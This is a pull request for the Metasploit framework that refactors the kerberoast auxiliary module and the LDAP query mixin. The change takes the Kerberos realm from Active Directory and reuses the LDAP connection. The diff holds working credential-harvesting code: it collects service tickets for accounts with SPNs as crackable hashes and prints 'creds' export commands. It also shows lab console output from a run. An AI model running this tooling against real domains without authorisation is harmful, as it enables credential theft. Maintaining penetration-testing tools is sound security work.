### PR TITLE
Pr/collab/21447

### DIFF
--- a/lib/msf/core/exploit/remote/ldap/queries.rb
+++ b/lib/msf/core/exploit/remote/ldap/queries.rb
@@ -7,7 +7,7 @@ module Msf
   ###
   module Exploit::Remote::LDAP
     module Queries
-      def run_builtin_ldap_query(queryname)
+      def run_builtin_ldap_query(queryname, ldap: nil)
         missing_username = datastore['LDAPUsername'].blank?
         session_missing_or_wrong_type = (session.nil? || !session.is_a?(::Msf::Sessions::LDAP))
         bad_config = missing_username && session_missing_or_wrong_type
@@ -18,7 +18,7 @@ module Msf
         query = loaded_queries.select { |entry| entry['action'] == queryname }
         self.ldap_query = query[0]
         print_line
-        result_count = run_ldap_query(ldap_query['filter'], ldap_query['attributes']) do |result|
+        result_count = run_ldap_query(ldap_query['filter'], ldap_query['attributes'], ldap: ldap) do |result|
           yield result
         end
 
@@ -30,27 +30,35 @@ module Msf
         end
       end
 
-      def run_ldap_query(filter_string, attributes)
-        begin
-          ldap_connect do |ldap|
-            validate_bind_success!(ldap)
-            unless (base_dn = ldap.base_dn)
-              fail_with(Failure::UnexpectedReply, "Couldn't discover base DN!")
-            end
-
-            schema_dn = ldap.schema_dn
-            begin
-              filter = Net::LDAP::Filter.construct(filter_string)
-            rescue StandardError => e
-              fail_with(Msf::Module::Failure::BadConfig, "Could not compile the filter #{filter_string}. Error was #{e}")
-            end
-
-            result_count = perform_ldap_query_streaming(ldap, filter, attributes, base_dn, schema_dn) do |result, _attribute_properties|
-              yield result
-            end
+      def run_ldap_query(filter_string, attributes, ldap: nil, &block)
+        run_query = proc do |conn|
+          unless (base_dn = conn.base_dn)
+            fail_with(Failure::UnexpectedReply, "Couldn't discover base DN!")
           end
-        rescue Rex::ConnectionTimeout => e
-          fail_with(Msf::Module::Failure::Unreachable, "Could not connect. #{e}")
+
+          schema_dn = conn.schema_dn
+          begin
+            filter = Net::LDAP::Filter.construct(filter_string)
+          rescue StandardError => e
+            fail_with(Msf::Module::Failure::BadConfig, "Could not compile the filter #{filter_string}. Error was #{e}")
+          end
+
+          perform_ldap_query_streaming(conn, filter, attributes, base_dn, schema_dn) do |result, _attribute_properties|
+            block.call(result) if block
+          end
+        end
+
+        if ldap
+          run_query.call(ldap)
+        else
+          begin
+            ldap_connect do |conn|
+              validate_bind_success!(conn)
+              run_query.call(conn)
+            end
+          rescue Rex::ConnectionTimeout => e
+            fail_with(Msf::Module::Failure::Unreachable, "Could not connect. #{e}")
+          end
         end
       end
 

--- a/modules/auxiliary/gather/kerberoast.rb
+++ b/modules/auxiliary/gather/kerberoast.rb
@@ -6,6 +6,7 @@
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::Kerberos::Client
   include Msf::Exploit::Remote::LDAP
+  include Msf::Exploit::Remote::LDAP::ActiveDirectory
   include Msf::Exploit::Remote::LDAP::Queries
   include Msf::OptionalSession::LDAP
   include Msf::Exploit::Deprecated
@@ -57,7 +58,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-    if datastore['TARGET_USER'].nil?
+    if datastore['TARGET_USER'].blank?
       run_ldap
     else
       run_user
@@ -85,24 +86,24 @@ class MetasploitModule < Msf::Auxiliary
 
   def run_user
     verify_options
+
     user = datastore['TARGET_USER']
-    filter = "(&(objectClass=user)(sAMAccountName=#{Net::LDAP::Filter.escape(user)}))"
-    attributes = ['servicePrincipalName', 'sAMAccountName']
-    spn = nil
-    count = run_ldap_query(filter, attributes) do |result|
-      if result.respond_to?(:serviceprincipalname)
-        spn = result.serviceprincipalname[0]
-      end
+    realm = user_object = nil
+    ldap_connect do |ldap|
+      validate_bind_success!(ldap)
+      realm = adds_get_domain_info(ldap)[:dns_name]
+      user_object = adds_get_object_by_samaccountname(ldap, user)
     end
-    if count == 0
+
+    if user_object.nil?
       fail_with(Failure::BadConfig, "User #{user} not found")
-    elsif spn.nil?
+    elsif user_object[:serviceprincipalname].nil?
       fail_with(Failure::BadConfig, "User #{user} has no SPN")
     end
     begin
-      jtr = roast(user, spn)
+      jtr = roast(user, user_object[:serviceprincipalname].first, realm: realm)
       jtr_format = Metasploit::Framework::Hashes.identify_hash(jtr)
-      report_hash(jtr, jtr_format)
+      report_hash(jtr, jtr_format, realm: realm)
       print_good("Success: \n#{jtr}")
     rescue ::Rex::Proto::Kerberos::Model::Error::KerberosError => e
       print_error("#{user} reported as kerberoastable, but received error when attempting to retrieve TGS (#{e})")
@@ -113,17 +114,24 @@ class MetasploitModule < Msf::Auxiliary
     verify_options
     jtr_formats = Set.new
     hashes = []
-    run_builtin_ldap_query('ENUM_USER_SPNS_KERBEROAST') do |result|
-      spn = result.serviceprincipalname[0]
-      username = result.samaccountname[0]
-      begin
-        jtr = roast(username, spn)
-        hashes.append(jtr)
-        jtr_format = Metasploit::Framework::Hashes.identify_hash(jtr)
-        jtr_formats.add(jtr_format)
-        report_hash(jtr, jtr_format)
-      rescue ::Rex::Proto::Kerberos::Model::Error::KerberosError => e
-        print_error("#{username} reported as kerberoastable, but received error when attempting to retrieve TGS (#{e})")
+
+    realm = nil
+    ldap_connect do |ldap|
+      validate_bind_success!(ldap)
+      realm = adds_get_domain_info(ldap)[:dns_name]
+
+      run_builtin_ldap_query('ENUM_USER_SPNS_KERBEROAST') do |result|
+        spn = result.serviceprincipalname[0]
+        username = result.samaccountname[0]
+        begin
+          jtr = roast(username, spn, realm: realm)
+          hashes.append(jtr)
+          jtr_format = Metasploit::Framework::Hashes.identify_hash(jtr)
+          jtr_formats.add(jtr_format)
+          report_hash(jtr, jtr_format, realm: realm)
+        rescue ::Rex::Proto::Kerberos::Model::Error::KerberosError => e
+          print_error("#{username} reported as kerberoastable, but received error when attempting to retrieve TGS (#{e})")
+        end
       end
     end
     if hashes.empty?
@@ -135,14 +143,14 @@ class MetasploitModule < Msf::Auxiliary
 
     if jtr_formats.length > 1
       print_warning('NOTE: Multiple encryption types returned - will require separate cracking runs for each type.')
-      print_status('To obtain the crackable values for a praticular type, run `creds`:')
+      print_status('To obtain the crackable values for a particular type, run `creds`:')
       jtr_formats.each do |format|
         print_status("creds -t #{format} -O #{datastore['RHOST']} -o <outfile.(jtr|hcat)>")
       end
     end
   end
 
-  def roast(roasted, spn)
+  def roast(roasted, spn, realm:)
     components = spn.split('/')
     fail_with(Failure::UnexpectedReply, "Invalid SPN: #{spn}") unless components.length == 2
 
@@ -150,16 +158,14 @@ class MetasploitModule < Msf::Auxiliary
       name_type: Rex::Proto::Kerberos::Model::NameType::NT_SRV_INST,
       name_string: components
     )
-    # If we have a session set, we can use the login and domain information from it.
-    # But we need to let the user specify the KDC, as it might not be the Rhost the session is connected to
-    domain_name = session ? session.client.realm : datastore['LDAPDomain']
+
     rhostname = datastore['DomainControllerRhost']
     rhostname ||= session.client.peerhost if session
     username = session ? session.client.username : datastore['LDAPUsername']
     password = session ? session.client.password : datastore['LDAPPassword']
     authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base.new(
       host: rhostname,
-      realm: domain_name,
+      realm: realm,
       username: username,
       password: password,
       framework: framework,
@@ -189,7 +195,7 @@ class MetasploitModule < Msf::Auxiliary
     tgs_ticket, = authenticator.request_service_ticket(
       session_key,
       ticket,
-      domain_name.upcase,
+      realm.upcase,
       username,
       offered_etypes,
       expiry_time,
@@ -201,7 +207,7 @@ class MetasploitModule < Msf::Auxiliary
     format_tgs_rep_to_john_hash(tgs_ticket, roasted)
   end
 
-  def report_hash(hash, jtr_format)
+  def report_hash(hash, jtr_format, realm:)
     service_data = {
       address: rhost,
       port: rport,
@@ -216,7 +222,7 @@ class MetasploitModule < Msf::Auxiliary
       private_type: :nonreplayable_hash,
       jtr_format: jtr_format,
       realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
-      realm_value: session ? session.client.realm : datastore['LDAPDomain']
+      realm_value: realm
     }.merge(service_data)
 
     credential_core = create_credential(credential_data)

--- a/modules/auxiliary/gather/kerberoast.rb
+++ b/modules/auxiliary/gather/kerberoast.rb
@@ -120,7 +120,7 @@ class MetasploitModule < Msf::Auxiliary
       validate_bind_success!(ldap)
       realm = adds_get_domain_info(ldap)[:dns_name]
 
-      run_builtin_ldap_query('ENUM_USER_SPNS_KERBEROAST') do |result|
+      run_builtin_ldap_query('ENUM_USER_SPNS_KERBEROAST', ldap: ldap) do |result|
         spn = result.serviceprincipalname[0]
         username = result.samaccountname[0]
         begin


### PR DESCRIPTION
This fixes some issues I noticed where the module would fail when the `LDAPDomain` datastore option was not set correctly. LDAP allows a bunch of different authentication mechanisms and some ignore the LDAPDomain option (schannel) and some are permissive about using the NetBIOS name vs the FQDN (ntlm).

This avoids the problem entirely by using the ActiveDirectory mixin to pull the DNS name from the LDAP server. Since all code paths require an LDAP connection, we can just use that to get the value we know the target wants.

The second commit updates the Query mixin's `#run_builtin_ldap_query` method to take an optional `ldap` argument. This is used to reuse the established connection. Since we're now querying for the realm, without this we'd need to make two connections. Old callers should continue to work since if there's no `ldap`, it'll just make a connection for the query itself.

## Example

```
msf auxiliary(gather/kerberoast) > show options 

Module options (auxiliary/gather/kerberoast):

   Name                   Current Setting  Required  Description
   ----                   ---------------  --------  -----------
   DomainControllerRhost  192.168.159.10   no        The resolvable rhost for the Domain Controller
   Rhostname                               no        The domain controller's hostname
   SSL                    false            no        Enable SSL on the LDAP connection
   TARGET_USER                             no        Specific user to kerberoast
   Timeout                10               yes       The TCP timeout to establish Kerberos connection and read data


   Used when connecting via an existing SESSION:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  -1               no        The session to run this module on


   Used when making a new connection via RHOSTS:

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   LDAPDomain    msflab.local     no        The domain to authenticate to
   LDAPPassword                   no        The password to authenticate with
   LDAPUsername                   no        The username to authenticate with
   RHOSTS        192.168.159.10   no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT         389              no        The target port


View the full module info with the info, or info -d command.

msf auxiliary(gather/kerberoast) > run
[*] Running module against 192.168.159.10

[+] 192.168.159.10:88 - Received a valid TGT-Response
[*] TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20260514145819_default_192.168.159.10_mit.kerberos.cca_627283.bin
[-] svc_test reported as kerberoastable, but received error when attempting to retrieve TGS (Kerberos Error - KRB_AP_ERR_BADMATCH (36) - Ticket and authenticator don't match)

[+] Query returned 1 result.
[-] No hashes were obtained from kerberoasting.
[*] Auxiliary module execution completed
msf auxiliary(gather/kerberoast) >
```